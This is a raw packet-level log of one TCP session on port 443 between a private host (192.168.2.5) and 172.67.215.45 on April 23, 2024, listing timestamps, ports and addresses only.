Apr 23, 2024 07:53:27.687320948 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.687340021 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.687383890 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.687391043 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.687426090 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.688523054 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.688539982 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.688585997 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.688597918 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.688632965 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.690005064 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.690021038 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.690069914 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.690077066 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.690112114 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.691540003 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.691555977 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.691606045 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.691613913 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.691664934 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.692737103 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.692754030 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.692810059 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.692816019 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.692854881 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.694052935 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.694068909 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.694116116 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.694123983 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.694164038 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.695543051 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.695564032 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.695600986 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.695607901 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.695635080 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.695648909 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.696878910 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.696897030 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.696965933 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.696974039 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.697012901 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.698548079 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.698565960 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.698616982 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.698625088 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.698661089 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.703315020 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.703331947 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.703391075 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.703407049 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.703454018 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.705127001 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.705143929 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.705210924 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.705219030 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.705255032 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.707847118 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.707864046 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.707916975 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.707925081 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.707961082 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.712716103 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.712743998 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.712788105 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.712812901 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.712838888 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.712862968 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.714761019 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.714777946 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.714829922 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.714837074 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.714875937 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.718287945 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.718306065 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.718369007 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.718384981 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.718440056 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.721194983 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.721211910 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.721257925 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.721266985 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.721291065 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.721308947 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.723536968 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.723552942 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.723608971 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.723615885 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.723653078 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.724455118 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.724469900 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.724515915 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.724525928 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.724562883 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.725311995 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.725327969 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.725378036 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.725385904 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.725425005 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.726413965 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.726444960 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.726480961 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.726488113 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.726515055 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.726528883 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.728728056 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.728744030 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.728795052 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.728801966 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.728826046 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.728843927 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.729863882 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.729880095 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.729937077 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.729944944 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.729979038 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.730953932 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.730972052 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.731019974 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.731026888 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.731061935 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.732063055 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.732078075 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.732120991 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.732130051 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.732166052 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.733266115 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.733282089 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.733329058 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.733334064 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.733359098 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.733366966 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.734814882 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.734832048 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.734878063 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.734884977 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.734903097 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.734976053 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.735148907 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.735166073 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.735213041 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.735219955 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.735240936 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.735255003 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.735753059 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.735768080 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.735832930 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.735841036 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.735851049 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.735877037 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.736433029 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.736449003 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.736495972 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.736504078 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.736515045 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.736532927 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.737394094 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.737411022 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.737457991 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.737464905 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.737504959 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.738056898 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.738071918 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.738120079 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.738126993 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.738148928 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.738168001 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.738809109 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.738825083 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.738874912 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.738882065 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.738908052 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.738924026 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.739869118 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.739883900 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.739943027 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.739950895 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.739990950 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.740279913 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.740298033 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.740339994 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.740346909 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.740387917 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.740395069 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.740622044 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.740638018 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.740683079 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.740689039 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.740704060 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.740725040 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.741189003 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.741204977 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.741255045 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.741261959 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.741278887 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.741301060 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.741746902 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.741763115 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.741818905 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.741825104 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.741841078 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.741862059 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.742259979 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.742275953 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.742345095 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.742352009 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.742391109 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.742906094 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.742923021 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.742968082 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.742975950 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.743046045 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.743833065 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.743849993 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.743896961 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.743906021 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.743944883 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.744538069 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.744554043 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.744613886 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.744620085 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.744636059 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.744654894 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.745095015 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.745111942 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.745156050 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.745163918 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.745177984 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.745196104 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.745975018 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.745990992 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.746036053 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.746043921 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.746064901 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.746073008 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.746764898 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.746779919 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.746828079 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.746834040 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.746855974 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.746872902 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.747226000 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.747240067 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.747283936 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.747291088 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.747313976 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.747328997 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.747723103 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.747740984 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.747786999 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.747793913 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.747836113 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.748202085 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.748224974 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.748311043 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.748318911 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.748354912 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.748598099 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.748614073 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.748661995 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.748667955 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.748687029 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.748706102 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.749016047 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.749032974 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.749075890 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.749083042 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.749094009 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.749114990 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.749533892 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.749550104 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.749614000 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.749619961 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.749660969 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.749918938 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.749936104 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.749979019 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.749985933 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.750008106 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.750016928 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.750359058 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.750375986 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.750422001 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.750428915 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.750441074 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.750458002 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.750787973 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.750803947 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.750849009 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.750854969 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.750895977 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.751187086 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.751204967 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.751250982 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.751257896 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.751291990 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.751749992 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.751766920 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.751810074 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.751816988 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.751844883 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.751853943 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.752295971 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.752312899 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.752356052 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.752362967 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.752377987 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.752392054 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.753650904 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.753665924 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.753717899 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.753726006 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.753763914 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.755336046 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.755352020 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.755414009 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.755424976 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.755464077 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.756369114 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.756397009 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.756437063 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.756443024 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.756465912 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.756483078 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.756750107 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.756767035 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.756808996 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.756814957 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.756839037 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.756853104 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.757569075 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.757585049 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.757632017 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.757638931 CEST	443	49729	172.67.215.45	192.168.2.5
